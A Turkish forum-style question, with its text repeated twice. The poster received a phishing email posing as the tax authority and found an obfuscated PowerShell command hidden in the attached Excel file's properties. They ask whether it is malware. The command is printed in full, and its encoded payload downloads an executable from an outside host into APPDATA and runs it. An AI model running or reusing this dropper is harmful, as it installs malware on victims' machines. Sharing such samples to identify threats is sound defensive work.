Selam,
Gelirler.gov.tr üzerinden spam klasörüme bir email düşmüş. Tebligatlarına email adresimi verdiğim için spam olmadığını düşündüm. Yine de şüphelendim. excel dosyasını virustotal.com adresinden tarattım temiz çıktı. Açmaya karar verdim ve dosya makro ve activex denetimleri yüzünden düzgün görüntülenemedi. Biraz daha kaşındım ve denetimleri serbest bıraktım. Dosya yine düzgün görütülenmedi. Dosyayı biraz inceleyim dedim bilgi / başlık kısmında bir powershell komutu vardı.
POwERShelL.eXe -eXEcUTIONPoLICY BYPASs -NoPrOFile -WIndOWStYLE HiddeN -encODedCOmMaNd IAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAKABuAGUAdwAtAE8AQgBKAGUAQwB0ACAAUwB5AHMAVABFAG0ALgBuAGUAdAAuAHcARQBiAEMATABpAEUAbgBUACkALgBkAE8AVwBuAEwATwBBAGQARgBpAGwAZQAoACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAB0gaAB0AHQAcAA6AC8ALwBzAGEAbQB1AHIAbQBhAGsAaQBuAGEALgBjAG8AbQAuAHQAcgAvAFMAYQBtAHMAdQByADEALwBUAEMAMgAwAC0ANgAuAGUAeABlAB0gIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAALAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAdICQARQBOAHYAOgBBAFAAcABkAEEAVABBAFwARgBpAGwAZQBuAGEAbQBlAC4AZQB4AGUAHSAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAApACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgADsAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAcwBhAFAAUwAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAdICQARQBuAFYAOgBhAFAAcABEAEEAdABhAFwARgBpAGwAZQBuAGEAbQBlAC4AZQB4AGUAHSA=
Şimdi hala virüsü mi değil mi anlamadım. Eğer virüs ise çok profesyonel. Değilse dosya neden açılmıyor?
Gelirler.gov.tr üzerinden spam klasörüme bir email düşmüş. Tebligatlarına email adresimi verdiğim için spam olmadığını düşündüm. Yine de şüphelendim. excel dosyasını virustotal.com adresinden tarattım temiz çıktı. Açmaya karar verdim ve dosya makro ve activex denetimleri yüzünden düzgün görüntülenemedi. Biraz daha kaşındım ve denetimleri serbest bıraktım. Dosya yine düzgün görütülenmedi. Dosyayı biraz inceleyim dedim bilgi / başlık kısmında bir powershell komutu vardı.
POwERShelL.eXe -eXEcUTIONPoLICY BYPASs -NoPrOFile -WIndOWStYLE HiddeN -encODedCOmMaNd IAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAKABuAGUAdwAtAE8AQgBKAGUAQwB0ACAAUwB5AHMAVABFAG0ALgBuAGUAdAAuAHcARQBiAEMATABpAEUAbgBUACkALgBkAE8AVwBuAEwATwBBAGQARgBpAGwAZQAoACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAB0gaAB0AHQAcAA6AC8ALwBzAGEAbQB1AHIAbQBhAGsAaQBuAGEALgBjAG8AbQAuAHQAcgAvAFMAYQBtAHMAdQByADEALwBUAEMAMgAwAC0ANgAuAGUAeABlAB0gIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAALAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAdICQARQBOAHYAOgBBAFAAcABkAEEAVABBAFwARgBpAGwAZQBuAGEAbQBlAC4AZQB4AGUAHSAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAApACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgADsAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAcwBhAFAAUwAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAdICQARQBuAFYAOgBhAFAAcABEAEEAdABhAFwARgBpAGwAZQBuAGEAbQBlAC4AZQB4AGUAHSA=
Şimdi hala virüsü mi değil mi anlamadım. Eğer virüs ise çok profesyonel. Değilse dosya neden açılmıyor?
